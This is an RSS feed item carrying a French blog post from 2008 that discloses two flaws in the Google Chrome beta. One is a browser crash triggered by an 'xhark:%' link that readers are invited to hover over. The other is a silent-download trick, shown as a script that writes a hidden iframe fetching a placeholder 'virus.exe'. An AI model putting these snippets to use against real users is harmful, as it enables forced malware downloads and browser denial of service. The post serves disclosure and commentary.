		<comments>http://blogmotion.fr/systeme/failles-google-chrome-772#comments</comments>
		<pubDate>Thu, 04 Sep 2008 07:33:20 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Système]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exe]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[téléchargement]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=772</guid>
		<description><![CDATA[Le navigateur de Google reste en version bêta, trop de gens ont tendance à l&#8217;oublier ! Surement à cause du fait que trop de sites internet s&#8217;affichent en version bêta (et Google est loin d&#8217;être le dernier dans ce domaine !). C&#8217;est donc tombé, 2 failles DoS (Denial of Service) pour Google Chrome. Vous êtes [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignright size-full wp-image-775" style="margin: 5px;" title="gc-exploit" src="http://blogmotion.fr/wp-content/uploads/2008/09/gc-exploit.png" alt="" width="100" height="112" />Le <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">navigateur de Google</a> reste en version bêta, trop de gens ont tendance à l&#8217;oublier ! Surement à cause du fait que trop de sites internet s&#8217;affichent en version bêta (et Google est loin d&#8217;être le dernier dans ce domaine !).</p>
<p>C&#8217;est donc tombé, 2 failles DoS (Denial of Service) pour <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">Google Chrome.<span id="more-772"></span></a></p>
<p style="text-align: justify;"><p style="border-top: 2px solid rgb(181, 212, 254); border-bottom: 2px solid rgb(181, 212, 254); padding: 5px 20px 5px 45px; background: rgb(248, 250, 252) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/info.gif) no-repeat scroll 15px 50%;color: rgb(94, 98, 115); text-align: left;">Vous êtes septiques et pensez que ces failles doitvent encore mériter de nombreuses bidouilles ?</p></p>
<h2 style="text-align: justify;">1 &#8211; La Faille DoS</h2>
<p style="text-align: justify;">Ouvre <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">Google Chrome</a> et revenez sur cet article, puis <a href="xhark:%">survollez ce texte avec votre souris (le clic n&#8217;est même pas nécessaire)</a>. Alors heureux ? Ah oui, très heureux <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Le simple fait de mettre &laquo;&nbsp;xhark:%&nbsp;&raquo; dans la barre d&#8217;adresse fait planter <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">Google Chrome</a> (aucun rapport avec moi, vous pouvez mettre &laquo;&nbsp;toto%&nbsp;&raquo;) . Je dis bien Google Chrome et non l&#8217;onglet en cours, car Google avait prévu de parquer chaque onglet pour ne pas avoir un navigateur complètement planté à cause d&#8217;un seul onglet. Résultat : c&#8217;est pas le cas, Chrome plante complètement :</p>
<p style="text-align: center;"><img class="size-full wp-image-773 aligncenter" title="google-chrome-faille" src="http://blogmotion.fr/wp-content/uploads/2008/09/google-chrome-faille.png" alt="" width="447" height="169" /></p>
<p style="text-align: justify;">J&#8217;ai testé la faille sur XP SP3 et Vista SP1, tous deux impactés.</p>
<p style="text-align: justify;">Le problème vient du fichier chrome.dll (version 0.2.149.27), en fait le navigateur ne comprend pas le type de fichier envoyé et plante.</p>
<h2 style="text-align: justify;">2 &#8211; La faille du téléchargement automatique</h2>
<p style="text-align: justify;">Cette faille est beaucoup plus préoccupante que la première&#8230; elle permet de forcer un téléchargement sur votre machine, sans aucune confirmation (un exécutable ou virus par exemple), via une simple iframe (fonctionne sur Vista SP1 et XP SP3) :</p>
<p><p style="border-left: 5px solid rgb(195, 215, 234); padding: 5px 20px 5px 10px; background: rgb(240, 240, 240) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/noicon.gif) no-repeat scroll 10px 5px; font-family: Courier New,Courier,mono,times new roman; line-height: 150%; color: rgb(102, 102, 102);">&lt;script&gt;<br />
document.write(&#8216;&lt;iframe src=&nbsp;&raquo;http://www.example.com/virus.exe&nbsp;&raquo; frameborder=&nbsp;&raquo;0&#8243; width=&nbsp;&raquo;0&#8243; height=&nbsp;&raquo;0&#8243;&gt;&#8217;);<br />
&lt;/script&gt;</p></p>
<p style="text-align: justify;">Simple mais efficace pour celui qui n&#8217;a pas d&#8217;antivirus ou autre. Nous pouvons même imaginer de mettre un fichier très lourd, ce qui saturera votre connexion internet. Je pense à nos amis de belgiques qui ont des quotas imposés par leur fournisseurs d&#8217;accès (et oui ça existe encore ! <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  ). Ou encore à celui dont l&#8217;ip fera parti d&#8217;une liste à surveiller par le gouvernement car via l&#8217;iframe le lien contenait un lien vers un site pédophile ou autre&#8230;</p>
<p style="text-align: justify;">Bref vous l&#8217;aurez compris ce genre de faille n&#8217;est pas à prendre à la légère. Voilà qui devrait calmer tous ceux qui ont déjà abandonné leur Firefox ou Opera. Tous deux restent dans le domaine de la sécurité deux gros poids lourds <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<h2 style="text-align: justify;">Pourquoi s&#8217;alarmer ?</h2>
<p><img class="alignright size-full wp-image-774" style="margin: 5px;" title="blog-stats" src="http://blogmotion.fr/wp-content/uploads/2008/09/blog-stats.png" alt="" width="166" height="153" /></p>
<p style="text-align: justify;">Ce qui me fait plutôt peur, c&#8217;est lorsque je regarde les statistiques du blog au niveau des navigateurs : hier, vous étiez 21,3% à afficher le blog avec Chrome, sûrement pour l&#8217;essayer hein <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  Mais cela veut dire que le nombre de gens utilisant Chrome ne cessera d&#8217;augmenter, et que si Google ne réagit pas très rapidement sur ce genre de problèmes Chrome risque très vite d&#8217;avoir mauvaise réputation&#8230; et vous auriez raison de le penser.</p>
<p style="text-align: justify;">La version de Google Chrome impactée par cette faille est la v. bêta 0.2.149.27.</p>
<p><p style="border-top: 2px solid rgb(65, 105, 175); border-bottom: 2px solid rgb(65, 105, 175); padding: 5px 20px 5px 45px; background: rgb(223, 235, 255) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/world.gif) no-repeat scroll 15px 50%; text-align: left; color: rgb(102, 102, 102);"><a href="http://code.google.com/p/chromium/issues/detail?id=122">Faille numéro 1 reconnue par Google</a></p></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/systeme/failles-google-chrome-772">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 04/09/2008 |
<a href="http://blogmotion.fr/systeme/failles-google-chrome-772#comments">5 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/systeme/failles-google-chrome-772/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>

